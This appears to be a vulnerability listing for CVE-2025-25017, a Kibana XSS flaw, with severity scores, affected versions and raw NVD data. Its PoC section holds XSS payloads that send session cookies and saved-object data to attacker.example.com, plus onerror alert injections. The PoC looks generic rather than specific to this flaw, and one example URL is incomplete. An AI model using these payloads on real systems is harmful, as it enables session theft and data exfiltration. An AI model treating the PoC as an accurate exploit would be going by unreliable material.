Security Vulnerability Report
CVE-2025-25017 CVSS 8.2 HIGH

CVE-2025-25017

Published: 2025-10-10 10:15:33
Last Modified: 2025-10-30 14:29:19

Description

Improper Neutralization of Input During Web Page Generation in Kibana can lead to Cross-Site Scripting (XSS)

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana >= 7.0.0, < 8.18.8)
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana >= 8.19.0, < 8.19.4)
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana >= 9.0.0, < 9.0.7)
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana >= 9.1.0, < 9.1.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
CVE-2025-25017 - Kibana XSS PoC
Vulnerability: Improper Neutralization of Input During Web Page Generation
This PoC demonstrates how an attacker can inject malicious JavaScript through unescaped user input fields in Kibana.
-->

<!-- Example 1: Reflected XSS via URL parameter -->
<!-- Attacker crafts a malicious URL and sends it to a logged-in Kibana user -->
https://kibana.example.com/app/discover#/?_g=(filters:!())&_a=(query:(language:kuery,query:'))

<!-- Example 2: XSS payload injected into a dashboard visualization title -->
<script>
// Malicious payload - steal session cookie or perform actions on behalf of the user
fetch('https://attacker.example.com/steal?cookie=' + document.cookie);

// Or exfiltrate Elasticsearch data accessible to the victim
fetch('/api/saved_objects/_find?type=index-pattern&fields=title')
  .then(r => r.json())
  .then(data => {
    fetch('https://attacker.example.com/exfil', { method: 'POST', body: JSON.stringify(data) });
  });
</script>

<!-- Example 3: Stored XSS via index pattern or field name -->
<!-- When an admin creates an index pattern with a malicious name -->
<img src=x onerror="alert('XSS via Kibana CVE-2025-25017')">

<!-- Example 4: URL-based XSS in Kibana lens visualization -->
https://kibana.example.com/app/lens#/edit/<img/src=x onerror=alert(document.domain)>

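References

https://discuss.elastic.co/t/kibana-8-18-8-8-19-4-9-0-7-9-1-4-security-update-esa-2025-16/382450 (Vendor Advisory)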

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-25017", "sourceIdentifier": "[email protected]", "published": "2025-10-10T10:15:32.900", "lastModified": "2025-10-30T14:29:18.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation in Kibana can lead to Cross-Site Scripting (XSS)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "8.18.8", "matchCriteriaId": "DC3153A3-2F19-4238-9365-62F1CEB5BB09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.19.0", "versionEndExcluding": "8.19.4", "matchCriteriaId": "72E852B6-81A1-40E8-BD2C-70A6272EA31F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.7", "matchCriteriaId": "64BD24C3-4FAB-4446-87C0-5A75A882506F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndExcluding": "9.1.4", "matchCriteriaId": "77B25D2C-3471-4B57-B0A9-0896E7779887"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-18-8-8-19-4-9-0-7-9-1-4-security-update-esa-2025-16/382450", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}